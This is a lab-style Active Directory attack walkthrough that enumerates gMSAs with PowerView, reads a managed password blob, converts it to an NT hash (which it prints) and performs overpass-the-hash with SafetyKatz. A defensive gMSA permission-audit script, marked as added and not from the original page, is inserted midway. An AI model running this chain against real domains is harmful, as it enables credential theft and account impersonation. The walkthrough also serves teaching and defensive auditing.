
Enumerating gMSA using PowerView

First Loading PowerView

. .\PowerView.ps1


Now let's enumerate the gMSAs

Get-DomainObject -LDAPFilter '(objectClass=msDS-GroupManagedServiceAccount)'


Now let's see who has permission to read the password blob

Get-ADServiceAccount -Identity jumpone -Properties * | select PrincipalsAllowedToRetrieveManagedPassword
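The PrincipalsAllowedToRetrieveManagedPassword attribute is the only thing standing between a gMSA's password blob and anyone who can authenticate to the domain, so the defensive counterpart of the query above is to audit it for every gMSA rather than one. The script below is an added example and is not part of the original page; it assumes the ActiveDirectory (RSAT) module in a domain-joined session, and the group names in $BroadPrincipals and the $MemberThreshold value are assumptions chosen for illustration.

```powershell
# Added audit example (not from the original page): list every gMSA in the
# domain and who may retrieve its managed password, flagging principals that
# are too broad. Assumes the ActiveDirectory (RSAT) module; the group names
# in $BroadPrincipals and $MemberThreshold are assumptions for this example.
Import-Module ActiveDirectory

# Groups that effectively hand the password to the whole domain.
$BroadPrincipals = @('Domain Users', 'Domain Computers', 'Authenticated Users', 'Everyone', 'Users')
$MemberThreshold = 10   # assumed: a retrieval group larger than this deserves review

function Get-GmsaRetrievalAudit {
    $accounts = Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword

    foreach ($gmsa in $accounts) {
        $principals = @($gmsa.PrincipalsAllowedToRetrieveManagedPassword)

        if ($principals.Count -eq 0) {
            [pscustomobject]@{
                gMSA      = $gmsa.SamAccountName
                Principal = '<none>'
                Type      = 'n/a'
                Finding   = 'No principal may retrieve the password; confirm the account is still in use'
            }
            continue
        }

        foreach ($dn in $principals) {
            # Well-known SIDs (e.g. Authenticated Users) do not resolve to a DN.
            try   { $obj = Get-ADObject -Identity $dn -Properties sAMAccountName -ErrorAction Stop }
            catch { $obj = $null }

            if ($null -eq $obj) {
                [pscustomobject]@{
                    gMSA      = $gmsa.SamAccountName
                    Principal = $dn
                    Type      = 'unresolved'
                    Finding   = 'Unresolved principal (possibly a well-known SID); review manually'
                }
                continue
            }

            $finding = 'OK'
            if ($BroadPrincipals -contains $obj.Name) {
                $finding = 'BROAD: every member of this well-known group can read the password'
            }
            elseif ($obj.ObjectClass -eq 'group') {
                $members = @(Get-ADGroupMember -Identity $dn -Recursive)
                if ($members.Count -gt $MemberThreshold) {
                    $finding = "Large retrieval group ($($members.Count) members); scope it to the hosts that need it"
                }
            }
            elseif ($obj.ObjectClass -eq 'user') {
                $finding = 'User account can read the password; expected a computer or a tightly scoped group'
            }

            [pscustomobject]@{
                gMSA      = $gmsa.SamAccountName
                Principal = $obj.sAMAccountName
                Type      = $obj.ObjectClass
                Finding   = $finding
            }
        }
    }
}

Get-GmsaRetrievalAudit | Sort-Object gMSA | Format-Table -AutoSize
```

Any row whose Finding is not OK is a gMSA whose password is retrievable by more than the specific computer accounts that run the service; the fix is Set-ADServiceAccount with a PrincipalsAllowedToRetrieveManagedPassword value that names only those hosts.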


Now let’s read the password

$Passwordblob = (Get-ADServiceAccount -Identity jumpone -Properties msDS-ManagedPassword).'msDS-ManagedPassword'
Import-Module C:\AD\Tools\DSInternals_v4.7\DSInternals\DSInternals.psd1
$decodedpwd = ConvertFrom-ADManagedPasswordBlob $Passwordblob
ConvertTo-NTHash -Password $decodedpwd.SecureCurrentPassword


And we got the hash

Username: jumpone
ntlmhash: 367032486cc36f7ba0561d7e3e90f615

Now let’s OverPass-The-Hash

.\SafetyKatz.exe "sekurlsa::pth /user:jumpone /ntlm:367032486cc36f7ba0561d7e3e90f615 /domain:us.techcorp.local /ptt"